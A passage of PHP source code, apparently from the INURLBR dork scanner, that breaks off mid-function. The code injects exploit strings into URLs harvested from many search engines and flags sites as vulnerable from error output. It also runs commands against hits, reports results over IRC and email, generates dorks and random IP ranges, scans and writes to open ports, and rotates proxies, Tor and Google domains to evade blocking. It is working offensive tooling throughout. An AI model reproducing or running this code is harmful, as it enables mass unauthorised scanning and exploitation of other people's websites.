  2798. $pagStart = ($pagStart + $pagIncrement);
  2799. $pagStart2_ = ($pagStart2_ + $pagIncrement);
  2800. $pagStart3_ = ($pagStart3_ + $pagIncrement2);
  2801. $contMaxpg++;
  2802. __timeSec('delay');
  2803.  
  2804. if (!is_null($_SESSION['config']['max_pag']) && $_SESSION['config']['max_pag'] == $contMaxpg) {
  2805.  
  2806. break;
  2807. }
  2808. }
  2809. }
  2810.  
  2811. ################################################################################
  2812. #SUB PROCESS INJECT VALUES######################################################
  2813. ################################################################################
  2814.  
  2815. function __subExecExploits($target, $exploitArray = array()) {
  2816.  
  2817. echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  2818. echo " |[ SUB PROCESS ]::\n";
  2819. $target = __filterHostname($target);
  2820.  
  2821. foreach ($exploitArray as $value) {
  2822.  
  2823. $postDados = !is_null($_SESSION["config"]["sub-post"]) ? __convertUrlQuery($value) : NULL;
  2824. $patch_GP = (is_null($postDados) ? $value : NULL);
  2825. $url = $target . $_SESSION["config"]["sub-concat"] . $patch_GP;
  2826.  
  2827. echo "{$_SESSION["c7"]}-[||]{$_SESSION["c0"]}";
  2828. $resultado__ = __request_info($url, $_SESSION["config"]["proxy"], $postDados);
  2829. __plus();
  2830. $ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
  2831. strstr($resultado__['server']['http_code'], $_SESSION['config']['ifcode']) ?
  2832. "CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
  2833. $ifredirect = (strstr($resultado__['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ? $resultado__['server']['redirect_url'] : NULL;
  2834. $_ex['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado__['corpo']);
  2835.  
  2836. __plus();
  2837. $_ex['vull_style'] = (not_isnull_empty($_ex['erroReturn'])) ?
  2838. "{$_SESSION["c15"]}[ INFO ][ {$_ex['erroReturn']} ]\n[ INFO ][ TARGET POTENTIALLY VULNERABLE ]: " . __cli_beep() : NULL;
  2839. echo (not_isnull_empty($_ex['erroReturn']) ? "\n{$_ex['vull_style']}{$url}\n{$_SESSION["c0"]}" : NULL);
  2840. echo (not_isnull_empty($_ex['erroReturn']) ? __saveValue($_SESSION['config']['arquivo_output'], $url, 1) . "\n" : NULL);
  2841. __plus();
  2842. $_SESSION['config']['resultado_valores'].=(not_isnull_empty($_ex['erroReturn']) ? "{$url}\n" : NULL);
  2843. (not_isnull_empty($_ex['erroReturn']) && not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
  2844. __ircMsg($_SESSION['config']['irc'], "{$_ex['erroReturn']}::: {$url}") : NULL);
  2845.  
  2846. (not_isnull_empty($_ex['erroReturn']) && !is_null($_SESSION['config']['sub-cmd-vul']) ? __command($_SESSION['config']['sub-cmd-vul'], $url) : NULL);
  2847. (not_isnull_empty($_SESSION['config']['sub-cmd-all']) ? __command($_SESSION['config']['sub-cmd-all'], $url) : NULL);
  2848. __plus();
  2849. __timeSec('delay');
  2850. }
  2851. unset($_ex);
  2852. }
  2853.  
  2854. ################################################################################
  2855. #SEND VALUES EMAIL##############################################################
  2856. ################################################################################
  2857. # (PHP 4, PHP 5) mail — Send mailhttp://php.net/manual/en/function.mail.php
  2858.  
  2859. function __sendMail($email, $value) {
  2860.  
  2861. $headers = NULL;
  2862. $headers .= "From: <scanner-inurlbr@localhost>\r\n";
  2863. $headers .= "MIME-Version: 1.0\r\n";
  2864. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  2865. $headers .= "content-type: text/html\nX-priority: 1\n";
  2866. $body = "------------------------------------------------------\n";
  2867. $body.="DATE: [" . date("d-m-Y H:i:s") . "]";
  2868. $body.=not_isnull_empty($_SESSION['config']['http-header']) ? "HTTP HEADER: {$_SESSION['config']['http-header']}\n" : NULL;
  2869. $body.=not_isnull_empty($_SESSION['config']['motor']) ? "MOTOR BUSCA: {$_SESSION['config']['motor']}\n" : NULL;
  2870. $body.=not_isnull_empty($_SESSION['config']['tipoerro']) ? "TIPO ERROR: {$_SESSION['config']['tipoerro']}\n" : NULL;
  2871. $body.=not_isnull_empty($_SESSION['config']['exploit-get']) ? "EXPLOIT GET: {$_SESSION['config']['exploit-get']}\n" : NULL;
  2872. $body.=not_isnull_empty($_SESSION['config']['exploit-post']) ? "EXPLOIT-POST: {$_SESSION['config']['exploit-post']}\n" : NULL;
  2873. $body.=not_isnull_empty($_SESSION['config']['command-vul']) ? "COMMAND VUL: {$_SESSION['config']['command-vul']}\n" : NULL;
  2874. $body.=not_isnull_empty($_SESSION['config']['command-all']) ? "COMMAND ALL: {$_SESSION['config']['command-all']}\n" : NULL;
  2875. $body.=not_isnull_empty($_SESSION['config']['user-agent']) ? "USER AGENT: {$_SESSION['config']['user-agent']}\n" : NULL;
  2876. $body.= "------------------------------------------------------\n";
  2877.  
  2878. if (mail($email, "[ INFO ][ OUTPUT INURLBR ]:: {$value}", $body, $headers)) {
  2879. __plus();
  2880. return "[ INFO ][ SUBMITTED SUCCESSFULLY ]\n";
  2881. } else {
  2882. __plus();
  2883. return "[ INFO ][ NOT SENT ]\n";
  2884. }
  2885. }
  2886.  
  2887. ################################################################################
  2888. #HOST GOOGLE RANDOM#############################################################
  2889. ################################################################################
  2890.  
  2891. function __dominioGoogleRandom() {
  2892.  
  2893. $_SESSION["random"]['dominio_google'] = array(
  2894. 'www.google.com', 'www.google.ac', 'www.google.com.om',
  2895. 'www.google.ad', 'www.google.ae', 'www.google.com.af',
  2896. 'www.google.com.ag', 'www.google.com.ai', 'www.google.am',
  2897. 'www.google.it.ao', 'www.google.com.ar', 'www.google.cat',
  2898. 'www.google.as', 'www.google.at', 'www.google.com.au',
  2899. 'www.google.az', 'www.google.ba', 'www.google.com.bd',
  2900. 'www.google.be', 'www.google.bf', 'www.google.bg',
  2901. 'www.google.com.bh', 'www.google.bi', 'www.google.bj',
  2902. 'www.google.com.bn', 'www.google.com.bo', 'www.google.com.br',
  2903. 'www.google.bs', 'www.google.co.bw', 'www.google.com.by',
  2904. 'www.google.com.bz', 'www.google.ca', 'www.google.com.kh',
  2905. 'www.google.cc', 'www.google.cd', 'www.google.cf',
  2906. 'www.google.cn', 'www.google.com.co', 'www.google.co.nz',
  2907. 'www.google.cg', 'www.google.ch', 'www.google.ci',
  2908. 'www.google.co.ck', 'www.google.cl', 'www.google.cm',
  2909. 'www.google.co.cr', 'www.google.com.cu', 'www.google.cv',
  2910. 'www.google.cz', 'www.google.de', 'www.google.nu',
  2911. 'www.google.dj', 'www.google.dk', 'www.google.dm',
  2912. 'www.google.com.do', 'www.google.dz', 'www.google.no',
  2913. 'www.google.com.ec', 'www.google.ee', 'www.google.com.eg',
  2914. 'www.google.es', 'www.google.com.et', 'www.google.com.np',
  2915. 'www.google.fi', 'www.google.com.fj', 'www.google.fm',
  2916. 'www.google.fr', 'www.google.ga', 'www.google.nl',
  2917. 'www.google.ge', 'www.google.gf', 'www.google.gg',
  2918. 'www.google.com.gh', 'www.google.com.gi', 'www.google.nr',
  2919. 'www.google.gl', 'www.google.gm', 'www.google.gp',
  2920. 'www.google.gr', 'www.google.com.gt', 'www.google.com.ni',
  2921. 'www.google.gy', 'www.google.com.hk', 'www.google.hn',
  2922. 'www.google.hr', 'www.google.ht', 'www.google.com.ng',
  2923. 'www.google.hu', 'www.google.co.id', 'www.google.iq',
  2924. 'www.google.ie', 'www.google.co.il', 'www.google.com.nf',
  2925. 'www.google.im', 'www.google.co.in', 'www.google.io',
  2926. 'www.google.is', 'www.google.it', 'www.google.ne',
  2927. 'www.google.je', 'www.google.com.jm', 'www.google.jo',
  2928. 'www.google.co.jp', 'www.google.co.ke', 'www.google.com.na',
  2929. 'www.google.ki', 'www.google.kg', 'www.google.co.kr',
  2930. 'www.google.com.kw', 'www.google.kz', 'www.google.co.mz',
  2931. 'www.google.la', 'www.google.com.lb', 'www.google.com.lc',
  2932. 'www.google.li', 'www.google.lk', 'www.google.com.my',
  2933. 'www.google.co.ls', 'www.google.lt', 'www.google.lu',
  2934. 'www.google.lv', 'www.google.com.ly', 'www.google.com.mx',
  2935. 'www.google.co.ma', 'www.google.md', 'www.google.me',
  2936. 'www.google.mg', 'www.google.mk', 'www.google.mw',
  2937. 'www.google.ml', 'www.google.mn', 'www.google.ms',
  2938. 'www.google.com.mt', 'www.google.mu', 'www.google.mv',
  2939. 'www.google.com.pa', 'www.google.com.pe', 'www.google.com.ph',
  2940. 'www.google.com.pk', 'www.google.pn', 'www.google.com.pr',
  2941. 'www.google.ps', 'www.google.pt', 'www.google.com.py',
  2942. 'www.google.com.qa', 'www.google.ro', 'www.google.rs',
  2943. 'www.google.ru', 'www.google.rw', 'www.google.com.sa',
  2944. 'www.google.com.sb', 'www.google.sc', 'www.google.se',
  2945. 'www.google.com.sg', 'www.google.sh', 'www.google.si',
  2946. 'www.google.sk', 'www.google.com.sl', 'www.google.sn',
  2947. 'www.google.sm', 'www.google.so', 'www.google.st',
  2948. 'www.google.com.sv', 'www.google.td', 'www.google.tg',
  2949. 'www.google.co.th', 'www.google.tk', 'www.google.tl',
  2950. 'www.google.tm', 'www.google.to', 'www.google.com.tn',
  2951. 'www.google.com.tr', 'www.google.tt', 'www.google.com.tw',
  2952. 'www.google.co.tz', 'www.google.com.ua', 'www.google.co.ug',
  2953. 'www.google.co.uk', 'www.google.us', 'www.google.com.uy',
  2954. 'www.google.co.uz', 'www.google.com.vc', 'www.google.co.ve',
  2955. 'www.google.vg', 'www.google.co.vi', 'www.google.com.vn',
  2956. 'www.google.vu', 'www.google.ws', 'www.google.co.za',
  2957. 'www.google.co.zm', 'www.google.co.zw'
  2958. );
  2959.  
  2960. return $_SESSION["random"]['dominio_google'][rand(0, count($_SESSION["random"]['dominio_google']) - 1)];
  2961. }
  2962.  
  2963. ################################################################################
  2964. #(CSE)-GOOGLE Custom Search Engine ID RANDOM####################################
  2965. ################################################################################
  2966.  
  2967. function __googleGenericRandom() {
  2968.  
  2969. $generic = array(
  2970. '013269018370076798483:wdba3dlnxqm',
  2971. '005911257635119896548:iiolgmwf2se',
  2972. '007843865286850066037:b0heuatvay8',
  2973. '002901626849897788481:cpnctza84gq',
  2974. '006748068166572874491:55ez0c3j3ey',
  2975. '012984904789461885316:oy3-mu17hxk',
  2976. '006688160405527839966:yhpefuwybre',
  2977. '003917828085772992913:gmoeray5sa8',
  2978. '007843865286850066037:3ajwn2jlweq',
  2979. '010479943387663786936:wjwf2xkhfmq',
  2980. '012873187529719969291:yexdhbzntue',
  2981. '012347377894689429761:wgkj5jn9ee4'
  2982. );
  2983. return $generic[rand(0, count($generic) - 1)];
  2984. }
  2985.  
  2986. ################################################################################
  2987. #PROXY HTTP BASE FILE###########################################################
  2988. ################################################################################
  2989.  
  2990. function __proxyHttpRandom() {
  2991.  
  2992. $proxy_file = (file_exists($_SESSION['config']['proxy-http-file']) ? __openFile($_SESSION['config']['proxy-http-file'], 1) : array());
  2993. $proxy_ = is_array($proxy_file) ? array_merge($_SESSION['config']['proxy-http'], $proxy_file) : $_SESSION['config']['proxy-http'];
  2994.  
  2995. return $proxy_[rand(0, count($proxy_) - 1)];
  2996. }
  2997.  
  2998. ################################################################################
  2999. #FILTER UNIQUE DOMAIN###########################################################
  3000. ################################################################################
  3001.  
  3002. function __filterDomainUnique($resultados) {
  3003.  
  3004. if (is_array($resultados)) {
  3005.  
  3006. foreach ($resultados as $value) {
  3007.  
  3008. $temp[] = "http://" . __filterHostname($value);
  3009. }
  3010.  
  3011. return array_unique(array_filter($temp));
  3012. }
  3013.  
  3014. return FALSE;
  3015. }
  3016.  
  3017. ################################################################################
  3018. #FILTER IF URL DOMAIN###########################################################
  3019. ################################################################################
  3020.  
  3021. function __filterURLif($resultados) {
  3022.  
  3023. if (is_array($resultados)) {
  3024.  
  3025. foreach ($resultados as $value) {
  3026.  
  3027. $temp[] = not_isnull_empty($_SESSION['config']['ifurl']) && strstr($value, $_SESSION['config']['ifurl']) ? $value : NULL;
  3028. }
  3029.  
  3030. return array_unique(array_filter($temp));
  3031. }
  3032.  
  3033. return FALSE;
  3034. }
  3035.  
  3036. ################################################################################
  3037. #GENERATOR RANGE IP#############################################################
  3038. ################################################################################
  3039.  
  3040. function __generatorRangeIP($range) {
  3041.  
  3042. $ip_ = explode(',', $range);
  3043. if (is_array($ip_)) {
  3044.  
  3045. $_ = array(0 => ip2long($ip_[0]), 1 => ip2long($ip_[1]));
  3046. while ($_[0] <= $_[1]) {
  3047.  
  3048. $ips[] = "http://" . long2ip($_[0]);
  3049. $_[0] ++;
  3050. }
  3051. } else {
  3052.  
  3053. return FALSE;
  3054. }
  3055.  
  3056. return $ips;
  3057. }
  3058.  
  3059. ################################################################################
  3060. #GENERATOR RANGE IP RANDOM######################################################
  3061. ################################################################################
  3062.  
  3063. function __generatorIPRandom($cont) {
  3064.  
  3065. $cont[0] = 0;
  3066. while ($cont[0] < $cont[1]) {
  3067.  
  3068. $bloc[0] = rand(0, 255);
  3069. $bloc[1] = rand(0, 255);
  3070. $bloc[2] = rand(0, 255);
  3071. $bloc[3] = rand(0, 255);
  3072. $ip[] = "http://{$bloc[0]}.{$bloc[1]}.{$bloc[2]}.{$bloc[3]}";
  3073. $cont[0] ++;
  3074. }
  3075. return array_unique($ip);
  3076. }
  3077.  
  3078. ################################################################################
  3079. #ACESSING FILE ROBOTS###########################################################
  3080. ################################################################################
  3081.  
  3082. function __getValuesRobots($url) {
  3083.  
  3084. $_[0] = "http://" . __filterHostname($url) . "/robots.txt";
  3085. $_[0] = __request_info($_[0], $_SESSION["config"]["proxy"], NULL);
  3086. echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  3087. echo " |[ ACCESSING FILE ROBOTS ]::\n";
  3088.  
  3089. if (not_isnull_empty($_[0]['corpo']) && $_[0]['server']['http_code'] == 200) {
  3090.  
  3091. $_[1] = array_unique(array_filter(explode("\n", $_[0]['corpo'])));
  3092.  
  3093. foreach ($_[1] as $value) {
  3094.  
  3095. if (strstr($value, 'Disallow:') || strstr($value, 'Allow:')) {
  3096.  
  3097. echo "|_[ + ]__|[ value={$value}\n";
  3098. __saveValue($_SESSION['config']['arquivo_output'], $value, 2);
  3099. }
  3100. __plus();
  3101. }
  3102. } else {
  3103.  
  3104. echo "\t[x][ ERRO ] LOAD FILE ROBOTS.TXT [ COD_HTTP ]:: {$_[0]['server']['http_code']}\n{$_SESSION["c0"]}";
  3105. }
  3106. }
  3107.  
  3108. ################################################################################
  3109. #Base64 string encryption md5 , hexadecimal, hex, base64 & random string########
  3110. ################################################################################
  3111.  
  3112. function __crypt($url) {
  3113.  
  3114. preg_match_all("#(md5|base64|hex|random)(\()(.*?)(\))#", $url, $_);
  3115. $cont = 0;
  3116.  
  3117. foreach ($_[0] as $replace) {
  3118.  
  3119. if (strstr($replace, 'md5('))
  3120. $func = 'md5';
  3121.  
  3122. if (strstr($replace, 'base64('))
  3123. $func = 'base64_encode';
  3124.  
  3125. if (strstr($replace, 'hex('))
  3126. $func = 'bin2hex';
  3127.  
  3128. if (strstr($replace, 'random('))
  3129. $func = 'random';
  3130.  
  3131. $url = str_replace($replace, $func($_[3][$cont]), $url);
  3132. $cont ++;
  3133. }
  3134. return $url;
  3135. }
  3136.  
  3137. ################################################################################
  3138. #GENERATE RANDOM STRING#########################################################
  3139. ################################################################################
  3140. #(PHP4,PHP5) Shuffle an array http://php.net/manual/en/function.shuffle.php
  3141.  
  3142. function random($__) {
  3143. $_ = 'A,a,B,b,C,c,D,d,E,e,F,f,G,g,';
  3144. $_.= 'H,h,I,i,J,j,K,k,L,l,M,m,';
  3145. $_.= '1,2,3,4,5,6,7,8,9,0';
  3146. $_ = explode(',', $_);
  3147. shuffle($_);
  3148. $_ = implode($_, '');
  3149. return substr($_, 0, $__);
  3150. }
  3151.  
  3152. ################################################################################
  3153. #GENERATE RANDOM DORKS##########################################################
  3154. ################################################################################
  3155.  
  3156. function __randomDork($_) {
  3157.  
  3158. $dk[1] = array('view', 'page', 'index', 'file', 'ver', 'web', 'form', 'public', 'map', 'visit',
  3159. 'site', 'perfil', 'sistema', 'system', 'cad', 'frm', 'content', 'conteudo', 'graf', 'page',
  3160. 'search', 'arch', 'class', 'app', 'galeria', 'text', 'noticia', 'default', 'storytopic', 'home',
  3161. 'lenoticia', 'counter', 'todos', 'all', 'principal', 'main', 'pesquisa', 'dir', 'category', 'news_more',
  3162. 'info', 'display', 'showrecord', 'download', 'sum', 'produtos', 'Menu', 'guia', 'product', 'about',
  3163. 'WebForms', 'proj', 'inter', 'PageText', 'topper', 'notes', 'name', 'redirect', 'open_link', 'artist',
  3164. 'curricu', 'resumen', 'top', 'list', 'directorio', 'Project', 'membre', 'photos', 'Contenido',
  3165. 'presentation', 'component', 'release', 'article', 'asesores', 'Detail', 'about', 'lire', 'story',
  3166. 'memoriam', 'transport', 'journal', 'album', 'community', 'includes', 'ler', 'video', 'configs', 'refer',
  3167. 'form_cpf', 'atualiza', 'refresh', 'materia', 'fotos', 'photos', 'itemdetail', 'listcategoriesandproduct',
  3168. 'myaccount', 'learnmore', 'powersearch', 'prodbycat', 'prodetails', 'prodlist', 'productDisplay', 'promotion',
  3169. 'pview', 'resellers', 'inc', 'oferta', 'layout', 'standard', 'blank', 'path', 'declaration', 'newsitem', 'games',
  3170. 'buy', 'readnews', 'event', 'news_view', 'communique_detail', 'kategorie', 'preview', 'faq2', 'comment', 'newsDetail',
  3171. 'shopping', 'shop_category', 'product_ranges_view', 'section', 'ages', 'curriculum', 'galeri_info', 'tekst', 'play_old',
  3172. 'viewapp', 'padrao', 'sitio', 'head', 'template', 'index1', 'index2', 'index3', 'index4', 'index5', 'mod', 'press', 'gery',
  3173. 'index_table', 'mainfile', '_functions', 'phpshop', 'new-visitor.inc', 'Packages', 'editor', 'board', 'advanced', 'pref',
  3174. 'q', 'side', 'home1', 'home2', 'home3', 'getbook', 'checkout', 'affiliate', 'addcart', 'product_info', 'showsub', 'library',
  3175. 'edition', 'get', 'temp', 'catalog', 'press2', 'company', 'jobs', 'review', 'input', 'cats', 'showmedia', 'event_info'
  3176. );
  3177.  
  3178.  
  3179. $dk[2] = array('view', 'file', 'ver', 'web', 'form', 'public', 'map', 'site', 'perfil', 'bookid',
  3180. 'sistema', 'system', 'cad', 'frm', 'content', 'id', 'action', 'user', 'option', 'area', 'catalogid',
  3181. 'tp', 'pg', 'p', 'v', 'a', 't', 'r', 'o', 'm', 'n', 'sec', 'lang', 'search', 'Itemid', 'open',
  3182. 'servicoid', 'id_ap', 'artic', 'pag', 'archive', 'ind', 'sigl', 'url', 'link', 'tp', 'cd', 'item_ID',
  3183. 'web', 'sourc', 'sitemap', 'go', 'galeria', 'img', 'notic', 'num', 'ter', 'dow', 'type', 'CartId',
  3184. 'redir', 'default', 'storytopic', 'topic', 'cod_noti', 'detalhe', 'ler', 'storyid', 'start',
  3185. 'click', 'title', 'tmpl', 'templat', 'cont', 'corp', 'contat', 'consult', 'main', 'exib', 'guia',
  3186. 'span', 'OpenDocument', 'document', 'codidem', 'pesq', 'print', 'imprimir', 'jobs', 'pic', 'contri',
  3187. 'code', 'myPage', 'openPage', 'homepage', 'home', 'inner', 'custom', 'bin', 'IsisScript', 'pid',
  3188. 'wxis.exe', 'wood', 'modules', 'kbn', 'chid', 'jump', 'mes', 'ano', 'month', 'year', 'day', 'dia', 'pre',
  3189. 'show', 'download', 'summit', 'new', 'coming', 'Category', 'produtos', 'Menu', 'uid', 'Consulta', 'qry',
  3190. 'product', 'WebForms', 'proj', 'inter', 'scgi', 'orig_q', 'b1', 'showpage', 'filter', 'Detail', 'about',
  3191. 'itemlist', 'memor', 'info', 'website', 'cidade', 'lic', 'materia', 'SEC_', 'includes', 'store', 'ler',
  3192. 'reader', 'src', 'theme', 'Boletim', 'busca', 'date', 'video', 'configs', 'exec', 'doc', 'refresh', 'telec',
  3193. 'digital', 'materia', 'portal', 'shop', 'photos', 'sales', 'open', 'check', 'token', 'general', 'process', 'ViewType',
  3194. 'idCategor', 'intCatalogID', 'Cart', 'maingroup', 'play', 'where', 'mod', 'panel', 'str', 'staff_id', 'buy', 'preview',
  3195. 'chapter', 'club_id', 'GLOBALS', 'absolute_path', 'body', 'from', 'pg_ID', 'load', 'systempath', 'conf', 'do', 'x', 'temp',
  3196. 'see', 'act', 'middle', 'content', 'q', 'my', 'to', 'nivel', 'arq', 'modo', 'rss', 'pagina', 'opcion', 'loader', 'l', 'this',
  3197. 'subject', 'param', 'index', 'tipo', 'second', 'loc', 'cat_id', 'magazin', 'artist_art', 'cID', 'cat', 'message_id', ''
  3198. );
  3199.  
  3200. $dk[3] = array('aspx', 'asp', 'cfm', 'php', 'php3', 'pl', 'cgi', 'py', 'jsp');
  3201.  
  3202. for ($i = 0; $i <= $_; $i++) {
  3203.  
  3204. $dm = NULL;
  3205. $da = $dk[1][rand(0, count($dk[1]) - 1)];
  3206. $dg = $dk[2][rand(0, count($dk[2]) - 1)];
  3207. $de = $dk[3][rand(0, count($dk[3]) - 1)];
  3208.  
  3209. $__[] = "\"{$dm}/{$da}.{$de}?{$dg}\"";
  3210. }
  3211. return $__;
  3212. }
  3213.  
  3214. ################################################################################
  3215. #VALIDATING OPEN DOORS##########################################################
  3216. ################################################################################
  3217. #(PHP 4, PHP 5) fsockopen — Open Internet or Unix domain socket connection
  3218. #http://php.net/manual/en/function.fsockopen.php
  3219.  
  3220. function __portScan($_) {
  3221.  
  3222. // FORMAT PORTS 80, 8181, 22, 21
  3223. $ports = explode(',', $_[1]);
  3224. echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  3225. echo " |[ PROCESS PORT-SCAN ]::\n";
  3226. foreach ($ports as $value) {
  3227.  
  3228. $conc = fsockopen($_SESSION['config']['server_ip'], $value, $_[2], $_[3], 30);
  3229. // HOST, POST, ERROR1, ERROR3, TIMEOUT
  3230.  
  3231. __plus();
  3232.  
  3233. if ($conc) {
  3234.  
  3235. echo "{$_SESSION["c1"]}|_[ + ]__|[ {$value}=\033[1m\033[32mOPEN{$_SESSION["c0"]}";
  3236. (not_isnull_empty($_SESSION['config']['port-write']) ? __portWrite($conc, $_SESSION['config']['port-write']) : NULL);
  3237. __saveValue($_SESSION['config']['arquivo_output'], "{$value}=OPEN", 2);
  3238.  
  3239. __plus();
  3240. $_[0]['url_port'] = $value;
  3241. (not_isnull_empty($_SESSION['config']['port-cmd']) ? __command($_SESSION['config']['port-cmd'], $_[0]) : NULL);
  3242. __plus();
  3243. } else {
  3244.  
  3245. echo "{$_SESSION["c1"]}|_[ x ]__|[ {$value}={$_SESSION["c9"]}CLOSED{$_SESSION["c0"]}\n";
  3246. __plus();
  3247. }
  3248. }
  3249. echo $_SESSION["c0"];
  3250. fclose($conc);
  3251. }
  3252.  
  3253. ################################################################################
  3254. #WRITING ON THE DOOR############################################################
  3255. ################################################################################
  3256. #(PHP 4, PHP 5) fwrite — Binary-safe file write
  3257. #http://php.net/manual/pt_BR/function.fwrite.php
  3258.  
  3259. function __portWrite($conect, $valores) {
  3260.  
  3261. $valores = explode(',', $valores);
  3262. foreach ($valores as $value) {
  3263.  
  3264. echo "{$_SESSION["c1"]}|_[ + ]__|[ WRITE SEND={$value}{$_SESSION["c0"]}\n";
  3265. fwrite($conect, "{$value}\r\n") . sleep(3);
  3266. __plus();
  3267. }
  3268. }
  3269.  
  3270. ################################################################################
  3271. #CODE SEARCH ENGINES############################################################
  3272. ################################################################################
  3273. //$_SESSION['config']['cod'] = '
  3274.  
  3275. function __engines($dork, $list_proxy) {
  3276.  
  3277. $dork_ = (not_isnull_empty($dork)) ? $dork : __getOut("DEFINA SUA DORK\n");
  3278. $list_proxy_ = (!is_null($list_proxy) ? $list_proxy[rand(0, count($list_proxy) - 1)] : NULL);
  3279.  
  3280. $confArray = array("list_proxy_rand" => $list_proxy_, "list_proxy_file" => $list_proxy);
  3281.  
  3282. (!is_null($_SESSION["config"]["tor-random"]) && !is_null($_SESSION["config"]["proxy"]) ? __renewTOR() : NULL);
  3283.  
  3284. echo "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ SEARCHING ]:: {$_SESSION["c1"]}{{$_SESSION["c0"]} ";
  3285.  
  3286. __plus();
  3287.  
  3288. echo (!is_null($list_proxy_) ? "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ PROXY FILE RANDOM ]:: {$_SESSION["c1"]}[ {$list_proxy_} ]{$_SESSION["c0"]} " : NULL );
  3289.  
  3290. ################################################################################
  3291. # SEARCH ENGINE ::: google
  3292. ################################################################################
  3293.  
  3294. if (__validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3295.  
  3296. $randHost = __dominioGoogleRandom();
  3297. $_SESSION["config"]["dork_tmp"] = $dork_;
  3298. $_SESSION["config"]["conf_array_tmp"] = $confArray;
  3299. __pageEngine($confArray, "GOOGLE - {$randHost}", "https://{$randHost}/search?q=[DORK]&num=1500&btnG=Search&pws=1", $dork_, $postDados, 0, 0, 1);
  3300. }
  3301.  
  3302.  
  3303. ################################################################################
  3304. # SEARCH ENGINE ::: bing
  3305. ################################################################################
  3306.  
  3307. if (__validateOptions($_SESSION["config"]["motor"], 2) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3308.  
  3309. __pageEngine($confArray, "BING", "http://www.bing.com/search?q=[DORK]&&filt=rf&first=[PAG]", $dork_, $postDados, 1, 991, 50);
  3310. }
  3311.  
  3312. ################################################################################
  3313. # SEARCH ENGINE ::: yahoo
  3314. ################################################################################
  3315.  
  3316. if (__validateOptions($_SESSION["config"]["motor"], 3) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3317.  
  3318. __pageEngine($confArray, "YAHOO BR", "http://search.yahoo.com/search?p=[DORK]&ei=UTF-8&b=[PAG]", $dork_, $postDados, 1, 471, 10);
  3319. }
  3320.  
  3321. ################################################################################
  3322. # SEARCH ENGINE ::: ask
  3323. ################################################################################
  3324.  
  3325. if (__validateOptions($_SESSION["config"]["motor"], 4) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3326.  
  3327. __pageEngine($confArray, "ASK", "http://www.ask.com/web?q=[DORK]&page=[PAG]&qid=[RANDOM]", $dork_, $postDados, 0, 16, 1);
  3328. }
  3329.  
  3330. ################################################################################
  3331. # SEARCH ENGINE ::: hao123
  3332. ################################################################################
  3333.  
  3334.  
  3335. if (__validateOptions($_SESSION["config"]["motor"], 5) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3336.  
  3337. __pageEngine($confArray, "HAO123 BR", "http://search.hao123.com.br/s?tn=[RANDOM]&f=0&wd=[DORK]&haobd=[RANDOM]FG=1&ie=utf-8&pn=[PAG]&showTop=0", $dork_, $postDados, 0, 550, 10);
  3338. }
  3339.  
  3340. ################################################################################
  3341. # SEARCH ENGINE ::: googleapis
  3342. ################################################################################
  3343.  
  3344. if (__validateOptions($_SESSION["config"]["motor"], 1) || __validateOptions($_SESSION["config"]["motor"], 6) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3345.  
  3346. __pageEngine($confArray, "GOOGLE API", "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&rsz=8&q=[DORK]&start=[PAG]&userip=[IP]&filter=1&safe=off", $dork_, $postDados, 0, 56, 4);
  3347. }
  3348.  
  3349. ################################################################################
  3350. # SEARCH ENGINE ::: lycos
  3351. ################################################################################
  3352.  
  3353. if (__validateOptions($_SESSION["config"]["motor"], 7) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3354. $_ = __request_info("http://search.lycos.com", $_SESSION["config"]["proxy"], $postDados);
  3355. $_SESSION["config"]["idPesquisaLycos"] = __getIdSearchLycos($_["corpo"]);
  3356.  
  3357. __pageEngine($confArray, "LYCOS", "http://search.lycos.com/web?q=[DORK]&keyvol={$_SESSION["config"]["idPesquisaLycos"]}&pn=[PAG]", $dork_, $postDados, 0, 24, 1);
  3358. }
  3359.  
  3360. ################################################################################
  3361. # SEARCH ENGINE ::: uol.com.br
  3362. ################################################################################
  3363.  
  3364. if (__validateOptions($_SESSION["config"]["motor"], 8) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3365.  
  3366. __pageEngine($confArray, "UOL BR", "http://busca.uol.com.br/web/?q=[DORK]&start=[PAG]", $dork_, $postDados, 10, 130, 10);
  3367. }
  3368.  
  3369. ################################################################################
  3370. # SEARCH ENGINE ::: us.yhs4.search.yahoo
  3371. ################################################################################
  3372.  
  3373. if (__validateOptions($_SESSION["config"]["motor"], 9) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3374.  
  3375. __pageEngine($confArray, "YAHOO US", "http://us.yhs4.search.yahoo.com/yhs/search?p=[DORK]&fr=goodsearch-yhsif&b=[PAG]", $dork_, $postDados, 1, 551, 10);
  3376. }
  3377.  
  3378. ################################################################################
  3379. # SEARCH ENGINE ::: sapo.pt
  3380. ################################################################################
  3381.  
  3382. if (__validateOptions($_SESSION["config"]["motor"], 10) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3383.  
  3384. __pageEngine($confArray, "SAPO", "http://pesquisa.sapo.pt/?adultfilter=strict&barra=resumo&cluster=0&format=html&limit=10&location=pt&page=[PAG]&q=[DORK]&st=web", $dork_, $postDados, 0, 14, 1);
  3385. }
  3386.  
  3387. ################################################################################
  3388. # SEARCH ENGINE ::: dmoz
  3389. ################################################################################
  3390.  
  3391. if (__validateOptions($_SESSION["config"]["motor"], 11) || __validateOptions($_SESSION["config"]["motor"], "all")) {
  3392.  
